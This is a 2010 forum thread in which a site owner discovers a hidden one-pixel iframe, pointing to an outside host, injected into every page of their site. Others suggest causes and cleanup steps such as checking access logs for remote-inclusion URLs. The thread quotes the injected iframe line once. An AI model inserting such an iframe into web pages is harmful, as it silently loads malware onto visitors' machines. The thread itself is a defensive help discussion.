deansaddigh Posted April 18, 2010 Share Posted April 18, 2010 Hi guys, some how someone has physically changed my pages and added <iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe> How have they done this, do you think they have got into our ftp account. Heres a page with it on. http://www.languageschoolsuk.com/coursecalculator.php if you look at source code , right at the end near the footer you can see. Any help and advice would be brilliant because i have nooooo idea. Quote Link to comment Share on other sites More sharing options...
TeddyKiller Posted April 18, 2010 Share Posted April 18, 2010 I dont have any ideas, but actually removing it is a start. If they continue to put it up, I'd suggest maybe track there IP and block it. Assumign it was user based, they could of done alot more than adding in an iframe practically invisible. I can actually say, that iframe is on every page in your site. I only checked 3, but if theres 3 random ones with the iframe in, it's likely they'll be alot more! Quote Link to comment Share on other sites More sharing options...
TeddyKiller Posted April 18, 2010 Share Posted April 18, 2010 http://www.Brenz.pl/rc/ Is the actual site in which was placed in the iframe. There was an unsuccesful typo. So.. I guess you got lucky, otherwise that could of been deadly. I just checked the site, it gave me a warning. Quote Link to comment Share on other sites More sharing options...
deansaddigh Posted April 18, 2010 Author Share Posted April 18, 2010 Thanks Teddy for your advice, i have started to remove them all. The thing i dont understand is, to physically change the page. they would have to have hacked our ftp server and physically modified the page, am i wright in thinking this. Quote Link to comment Share on other sites More sharing options...
TeddyKiller Posted April 18, 2010 Share Posted April 18, 2010 Hmm.. well sort of. There are other methods of hacking. Though don't ask me.. I don't know how to hack. Quote Link to comment Share on other sites More sharing options...
PFMaBiSmAd Posted April 18, 2010 Share Posted April 18, 2010 The web server access logs would indicate the who/what/when the files were modified (wrote to.) That would pin down if it was through FTP access, through the web hosting control panel, or through a script on your site (or some other site on the server.) Assuming that your pages include content that is specified on the end of the URL, you should also look at the access logs to find any unusual URLs where your pages were requested with get parameters that could have gotten your script(s) to execute included php code from another site. There would be whole URL's supplied as get parameters, something like - http://yourdomain.com/your_page.php?page=http://someURL/some_page.ext You should also download all the files and compare them with the last backup up make so that you can both find exactly what was changed and find any new files (such as a file management script that got uploaded to your site.) Quote Link to comment Share on other sites More sharing options...
deansaddigh Posted April 18, 2010 Author Share Posted April 18, 2010 Thanks for taking the time to reply. Im going to check what you have suggested, looks quite complex, but ill do some reading up on what you said. Quote Link to comment Share on other sites More sharing options...
Lekoaf Posted October 28, 2010 Share Posted October 28, 2010 This is NOT someone who has hacked your FTP. This comes from a trojan virus on your computer that not only screws up your whole computer, denying you access to any antivirus sites and stops all downloads. It also infects ALL your HTML files on your computer with this little IFrame script. I basically had to wipe my harddrive clean to get rid of the virus and after getting all my backed up files to my computer again I noticed that I had "infected" my entire website as well the next time I updated it. The reason for me necro posting this is because this topic comes up as top 3 on Google when searching for "Brenz.pl/rc/". I just thought the information should be correct. I hope this helps someone! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.